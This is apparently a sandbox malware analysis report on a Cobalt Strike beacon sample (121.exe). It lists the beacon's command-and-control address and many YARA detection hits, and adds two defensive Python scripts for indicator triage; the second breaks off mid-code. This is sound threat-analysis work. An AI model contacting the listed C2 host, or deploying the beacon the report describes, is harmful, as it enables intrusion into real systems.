Source: 121.exe, 00000000.00000003.2726578993.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2607132749.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2635387413.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2576279859.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2694595334.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/2
Source: 121.exe, 00000000.00000003.2245055221.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3060018775.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3092041130.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2274708587.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2185358392.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3031853030.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2272990691.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2215047117.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/226.16:60421/
Source: 121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/?r
Source: 121.exe, 00000000.00000003.3151184537.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3179225688.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/T
Source: 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/V
Source: 121.exe, 00000000.00000003.2126844172.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/WNIt
Source: 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/a
Source: 121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/b
Source: 121.exe, 00000000.00000003.2331738304.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3358305653.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/ca
Source: 121.exe, 00000000.00000003.3893306724.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3540285999.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3599182783.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4366341910.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3509521159.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/ca2dY
Source: 121.exe, 00000000.00000003.3092041130.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4014515237.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3122009496.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2303817957.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2334091700.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/ca8
Source: 121.exe, 00000000.00000003.3951714993.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/caEdh
Source: 121.exe, 00000000.00000003.4307921187.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/caIdd
Source: 121.exe, 00000000.00000003.4190918954.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3151184537.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3181156239.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3179225688.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/caJda
Source: 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/caM
Source: 121.exe, 00000000.00000003.2185358392.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2215028734.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.000000000011A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/caOdb
Source: 121.exe, 00000000.00000003.3210323568.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3238480994.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3241004912.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/caTd
Source: 121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/caX
Source: 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/cab
Source: 121.exe, 00000000.00000003.2517825725.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2519144542.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/cafa.dM
Source: 121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/cagK
Source: 121.exe, 00000000.00000003.2364494903.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2393839164.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2758216720.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2726578993.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2759574404.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/cagd
Source: 121.exe, 00000000.00000003.4130796318.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/cald
Source: 121.exe, 00000000.00000003.4249526901.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3893306724.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3270332274.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2694595334.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3062381181.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3031853030.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2821596006.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3479245632.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2882630735.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3477221868.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2697480697.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3449261664.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2850541886.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3300306811.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3298309211.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4366341910.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2880742433.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2943712531.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/cap
Source: 121.exe, 00000000.00000003.2821596006.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2820180707.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2156494637.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2126844172.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2155147374.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2792190012.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/capd
Source: 121.exe, 00000000.00000003.3092041130.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2972819737.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3002324860.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3122009496.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3000783488.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/car
Source: 121.exe, 00000000.00000003.2972819737.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3002324860.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2943712531.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3000783488.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/cavcsOdb
Source: 121.exe, 00000000.00000003.4249526901.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3389400003.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3417364243.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4190918954.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3419421492.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3329829025.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3360034969.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3358305653.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/cavd
Source: 121.exe, 00000000.00000003.3835071770.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2882630735.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2185358392.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2215028734.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2850541886.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2519144542.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2880742433.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2455534442.000000000011B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/cax
Source: 121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/k
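Every string above points at the same endpoint and differs only in what follows the port: fragments such as "/ca2dY", "/226.16:60421/" or "/?r" are whatever bytes happened to sit next to the URL in the scanned memory pages, not request paths the beacon actually uses. The indicator a practitioner should carry forward is the scheme, host and port; the real URIs come from the extracted configuration, not from these strings. The following script is an added example for this page (not Joe Sandbox code) that collapses such variants into a single indicator and discards non-routable hosts; its sample input is a constructed copy of a subset of the rows above.

```python
"""Collapse noisy memory-string URL variants into one C2 indicator.

Added example, not part of the Joe Sandbox report. SAMPLE_STRINGS is a
constructed copy of some "String found in binary or memory" rows above;
the bytes after the port are string-extraction residue, so only
scheme://host:port is kept as the indicator.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample input: URL-like strings as listed in the report.
SAMPLE_STRINGS = [
    "https://152.42.226.16:60421/",
    "https://152.42.226.16:60421/-",
    "https://152.42.226.16:60421/2",
    "https://152.42.226.16:60421/226.16:60421/",
    "https://152.42.226.16:60421/?r",
    "https://152.42.226.16:60421/T",
    "https://152.42.226.16:60421/ca2dY",
    "https://152.42.226.16:60421/caJda",
    "https://152.42.226.16:60421/cafa.dM",
    "https://152.42.226.16:60421/cap",
    "https://152.42.226.16:60421/cavcsOdb",
    "https://152.42.226.16:60421/k",
]


def canonical_c2(url: str) -> tuple[str, str, int] | None:
    """Return (scheme, host, port) for an absolute http(s) URL-like string,
    or None if it does not parse (bad scheme, missing host, bad port)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    try:
        port = parts.port  # raises ValueError for a non-numeric port
    except ValueError:
        return None
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    return parts.scheme, parts.hostname, port


def is_routable(host: str) -> bool:
    """True if host is a globally routable literal IP. Sandboxes also record
    loopback, link-local and RFC1918 strings, which are not indicators.
    Hostnames are kept; they need to be resolved and judged separately."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return True


def collapse_variants(strings):
    """Group raw strings by (scheme, host, port). Each value is the set of
    path/query residues observed for that endpoint, kept only so the
    analyst can see how much noise was folded into one indicator."""
    groups = defaultdict(set)
    for s in strings:
        key = canonical_c2(s)
        if key is None or not is_routable(key[1]):
            continue
        residue = s[len(f"{key[0]}://{key[1]}:{key[2]}"):]
        groups[key].add(residue)
    return dict(groups)


def indicators(strings):
    """Sorted list of (scheme://host:port, number of distinct raw variants
    that supported it)."""
    return sorted(
        (f"{scheme}://{host}:{port}", len(residues))
        for (scheme, host, port), residues in collapse_variants(strings).items()
    )


if __name__ == "__main__":
    for ioc, n in indicators(SAMPLE_STRINGS):
        print(f"{ioc}  (folded from {n} raw string variants)")
```

The variant count is worth keeping next to the indicator: a host:port that appears in dozens of differently truncated strings across many memory snapshots, as here, was clearly resident in the beacon's working memory for the whole run, whereas a single odd string may be a coincidence of adjacent bytes.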

System Summary

Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: CobaltStrike payload Author: ditekSHen
Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTR | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTR | Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTR | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
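The rows above repeat the same handful of rules against several views of two memory regions (the unpacked PE images at 0xA30000 and 0xCE0000, their raw and relocated forms, the corresponding dumps, and the whole process string space). What matters for triage is which regions are hit and whether independent rule families agree, not the raw row count. The script below is an added example for this page (not Joe Sandbox code) that parses rows in this layout, maps each source name to its region base address and summarises agreement per region; SAMPLE_ROWS is a constructed copy of a subset of the rows above, and "unknown" is treated as its own author bucket.

```python
"""Aggregate Joe Sandbox YARA "Matched rule" rows by memory region.

Added example, not part of the report or of Joe Sandbox. It parses rows in
the layout used above (both the flattened "UNPACKEDPEMatched rule" form and
a column-separated "UNPACKEDPE | Matched rule" form), recovers the base
address of the region each row refers to, and reports which regions are
corroborated by more than one rule author.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the rows in the System Summary section.
SAMPLE_ROWS = """
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
"""

# The type token is all caps; backtracking lets "UNPACKEDPEMatched" split
# into "UNPACKEDPE" + "Matched rule", and an optional " | " is tolerated.
ROW_RE = re.compile(
    r"^Source: (?P<source>.+?), type: (?P<type>[A-Z]+)\s*\|?\s*"
    r"Matched rule: (?P<rule>.+?) Author: (?P<author>.+?)\s*$"
)
# "<pid>.<stage>.<image name>.<hex base>.<n>[.raw].unpack"; the image name
# itself contains a dot (121.exe), so it is matched greedily and the
# base address is whatever hex field precedes the index.
UNPACK_RE = re.compile(
    r"^\d+\.\d+\.(?P<name>.+)\.(?P<addr>[0-9a-f]+)\.\d+(?:\.raw)?\.unpack$"
)
# ".sdmp" names carry the 16-digit base address as the fourth field.
SDMP_RE = re.compile(r"^\d{8}\.\d{8}\.\d+\.(?P<addr>[0-9A-Fa-f]{16})\.")


def parse_rows(text):
    """Yield a dict (source, type, rule, author) per row in report layout."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            yield m.groupdict()


def region_of(source):
    """Base address (int) of the region a source name refers to, or None for
    whole-process sources such as 'Process Memory Space'."""
    m = UNPACK_RE.match(source) or SDMP_RE.match(source)
    return int(m.group("addr"), 16) if m else None


def summarise(text):
    """Map region base -> {rule description: set(authors)}. Rows that are
    not tied to a single region are collected under the key None."""
    out = defaultdict(lambda: defaultdict(set))
    for row in parse_rows(text):
        out[region_of(row["source"])][row["rule"]].add(row["author"])
    return {region: dict(rules) for region, rules in out.items()}


def corroborated_regions(text, min_authors=2):
    """Regions whose matches come from at least min_authors distinct rule
    authors, as (base, rule count, sorted authors). Agreement between
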